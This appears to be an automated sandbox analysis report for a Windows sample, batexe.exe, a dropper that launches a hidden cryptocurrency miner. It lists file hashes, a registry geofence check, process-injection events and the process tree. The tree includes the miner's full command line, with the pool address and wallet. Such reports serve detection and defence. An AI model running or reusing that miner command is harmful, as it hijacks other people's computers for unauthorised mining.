Analysis
-
max time kernel
293s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
11-02-2024 17:00
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 1464 b2e.exe 3224 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3224 cpuminer-sse2.exe 3224 cpuminer-sse2.exe 3224 cpuminer-sse2.exe 3224 cpuminer-sse2.exe 3224 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/5104-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 5104 wrote to memory of 1464 5104 batexe.exe 85 PID 5104 wrote to memory of 1464 5104 batexe.exe 85 PID 5104 wrote to memory of 1464 5104 batexe.exe 85 PID 1464 wrote to memory of 3512 1464 b2e.exe 86 PID 1464 wrote to memory of 3512 1464 b2e.exe 86 PID 1464 wrote to memory of 3512 1464 b2e.exe 86 PID 3512 wrote to memory of 3224 3512 cmd.exe 89 PID 3512 wrote to memory of 3224 3512 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Users\Admin\AppData\Local\Temp\6EC7.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6EC7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6EC7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\71D4.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3224
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17.4MB
MD5422f8002f81d0a60fe005ed49810dff9
SHA1e52359c01ee24077ef817a10c05f14f82ba01af4
SHA25676ca221500b8d32b6c30ff03ff8f7ebd2de41eaa1fbdeebadd13dad54f3b55c8
SHA5123b404430ded51ca17500f2cda3584d9e77d5c0be272c45fb7ff24ad8250e1f4b3237dbfc41fe8621b10df641ea462e2ee3c9335aaadc89635bfd3cd974237b65
-
Filesize
6.8MB
MD57e306719ab1c3ad37e9fced281085f72
SHA117021bf7ed2590e63c507a196b9e91910e89943f
SHA2560f2f608f9fa19607d0e26aa78f018c42d383239c777dfdb32b890971cccf25f3
SHA512424dcad7b45177a1859e02c2466bfe8d749d344dff8576b8ac4d6c1d29916d5970dbc981329cfc50afce3cf0687fd36846a750663cd9b9a679bf2f05f1a66598
-
Filesize
6.9MB
MD547dfc99e11dd5b6365fe0668600b82b7
SHA1e7b63faab201e894f2fac11adeb394acb4291790
SHA256900cf6184b715c3d6283e1fb48a7547b38520b7d059a0ab93762f57013832133
SHA512d6deef8898a9b0023721d52190f6a9699d4db46765259ea287a0674223e8a503cbab8233c76426459c2d3d2af6dd4c1f14ebebb8d8d691a979a084fca85e22b9
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.0MB
MD5dae626b11af46c392130819340f83070
SHA1c8369936c56ce9d87bbfe04479a03c7071d69faf
SHA25652bbc8f1efd0e82809c29ec0f95475379c4d31e371fded64ac3335924d005e06
SHA512cb070364194431c42640741534cc718517cf9276eddcc8968701874b32bc6a3ce2a0a39c54ba48b1d76131a37d73ae33213f487abfba478b95574490bb8f8d20
-
Filesize
1.6MB
MD5cf8901f3ca3c3c51f95e159afba4dbd3
SHA176d8ce08d51a22cef486cd884db7ec1603571261
SHA2562e05f281848a648a55f18915a773e19f88869d0b3e4c9841b5da7a2ba2d3d2d1
SHA512104940827f7e7ac7695ed9886caab370b362b84cf3a8a185b94cdc5c75a90197cc89e7017d257d0888830f57a16ce65c86ee55f28b3400ff0f396c2f80e7e762
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
2.5MB
MD556e9fc62d257c784042d98fa553cf09d
SHA1611533c8dfaa859c0cd3b51b3cb31e9f7c294f03
SHA256ad0ee74b6a3266083eeacb2155e5abdf3ca8cd76bf55be5b80483be7657fec25
SHA512050e70999181b8d1e936d7846c3201f33496b4f49ace223206e23aec17804cdccf62794f404c1d2e1b551c07c180e307fd6268ff4b322054c543de4a96d6f522
-
Filesize
2.4MB
MD584d4f366a49cf3a2d40974fbaf1ae916
SHA1f106aeea661e23248be8a7f603d5eaffbacfa511
SHA256c4132c41cf1b942ab91d9eb97f932c8f4f5b4aaa626843b68c0b3fa8f77ebc6b
SHA5124ec22ef489760aa78c35ad39d0d47263993fc10cd82a01bce70e344a045767aa2ef9da819e73ef5682fe2689787c7a5c419b3e15ac871282030bfa665930888b
-
Filesize
2.2MB
MD5fa640bc95a5c7d55f8a0c1ad1b7c99ad
SHA1d441a00368e324e72af9737adce3bc5946614581
SHA256aa1559766dca7a103b10b26e59245cbb2109e5669625849e8a9892bac7d795c5
SHA512b701caad77def86fffc065005d8c788d49bc0ae5dfb64a968867d9f94fe3d2e9120ae90e4af8b12dd590e753fe08dadb2f38eb46909a54aa0b13a515f51fa37c
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770